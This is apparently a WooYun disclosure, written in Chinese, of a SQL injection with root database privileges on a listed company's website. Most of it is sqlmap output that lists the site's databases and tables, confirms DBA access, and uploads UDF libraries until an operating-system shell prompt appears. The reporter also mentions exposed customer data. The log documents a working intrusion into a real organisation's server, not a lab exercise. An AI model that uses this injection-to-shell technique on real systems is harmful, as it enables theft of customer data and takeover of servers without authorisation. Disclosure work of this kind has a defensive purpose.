WooYun.org

上市公司中源协和官网存在sql注入漏洞（root权限），暴露大量数据，并可getshell
漏洞页面：http://**.**.**.**//Investor_AnnouncementDetail.aspx?id=401
数据量蛮大的，这里只是简单的扫了一下

available databases [9]:
[*] db_nmw
[*] hezedb
[*] information_schema
[*] mqmgssspglxt
[*] mysql
[*] rsdome
[*] scdb
[*] tj_hzdb
[*] vcanbio_zhongyuanxiehe

Database: hezedb
[33 tables]
+-----------------------------+
| academicimage               |
| cultureimage                |
| fbranchimage                |
| gsgzs                       |
| jos_search_reports_customer |
| jos_search_reports_para     |
| newsimage                   |
| njbglist                    |
| productimage                |
| qdnj                        |
| qdqx                        |
| qnnj                        |
| qxnj                        |
| qznj                        |
| t_academic                  |
| t_annals                    |
| t_announcement              |
| t_companyinfo               |
| t_content                   |
| t_culture                   |
| t_fbranch                   |
| t_lefttitle                 |
| t_lefttitle_2               |
| t_log                       |
| t_medianews                 |
| t_menu                      |
| t_message                   |
| t_news                      |
| t_physician                 |
| t_product                   |
| t_user                      |
| t_weblink                   |
| t_xinxipl                   |
+-----------------------------+

好多客户信息啊
还可以拿shell呢
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0
[15:23:19] [INFO] testing if current user is DBA
[15:23:19] [INFO] fetching current user
[15:23:19] [INFO] retrieved: root@%
current user is DBA: True
[15:23:19] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 5 times
[15:23:19] [INFO] fetched data l
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
[15:42:56] [INFO] checking if UDF 'sys_eval' already exist
[15:42:56] [INFO] retrieved: 0
[15:42:56] [INFO] checking if UDF 'sys_exec' already exist
[15:42:56] [INFO] retrieved: 0
[15:42:56] [INFO] detecting back-end DBMS version from its banner
[15:42:56] [INFO] retrieved: 5.0.67
[15:43:16] [INFO] retrieved: 48384
[15:43:16] [INFO] the remote file ./libsctuk.dll is larger than the local file /usr/share/sqlmap/udf/mysql/windows/32/lib_mysqludf_sys.dll
[15:43:16] [ERROR] there has been a problem uploading the shared library, it looks like the binary file has not been written on the database underlying file system
do you want to proceed anyway? Beware that the operating system takeover will fail [y/N] y
[15:44:31] [INFO] creating UDF 'sys_eval' from the binary UDF file
[15:44:31] [INFO] creating UDF 'sys_exec' from the binary UDF file
[15:44:32] [INFO] going to use injected sys_eval and sys_exec user-defined functions for operating system command execution
[15:44:32] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>